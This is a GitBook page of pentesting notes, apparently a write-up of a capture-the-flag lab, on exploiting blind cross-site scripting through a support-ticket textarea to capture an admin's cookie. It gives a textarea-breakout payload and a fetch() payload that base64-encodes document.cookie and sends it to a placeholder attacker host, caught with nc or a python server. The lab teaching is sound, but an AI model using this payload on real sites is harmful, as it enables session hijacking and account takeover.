Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  1. WebApp Security
  2. XSS

Exploiting Blind XSS

PreviousPerfecting our PayloadNextSSTI

Last updated 1 year ago

Create an account

  • Once our account gets set up, click the Support Tickets tab, which is the feature we will investigate for weaknesses

  • Create a ticket and view the source to investigate where our text sits in the application

  • Hmm? well its inside the textarea tag (similar to our previous tasks), So close the textarea tag and then use the script tags to execute an alert - Just to confirm if it reflects !

</textarea><script>alert('THM');</script>

  • And yes, it does - Now our end goal is to raise a malicious ticket and get the admin's cookie in return, when viewed by the admin !

</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

  • The </textarea> tag closes the textarea field

  • The <script>tag opens open an area for us to write JavaScript

  • The fetch() command makes an HTTP request

  • {URL_OR_IP} is our IP address or the Burp Collab's link

  • ?cookie= is the query string that will contain the victim's cookies

  • btoa() command base64 encodes the victim's cookies

  • document.cookie accesses the victim's cookies for the Acme IT Support Website

  • </script>closes the JavaScript code block

Start a Listener using nc or start a web server using python and get the victim's cookie is b64 format - then decode it and submit the flag !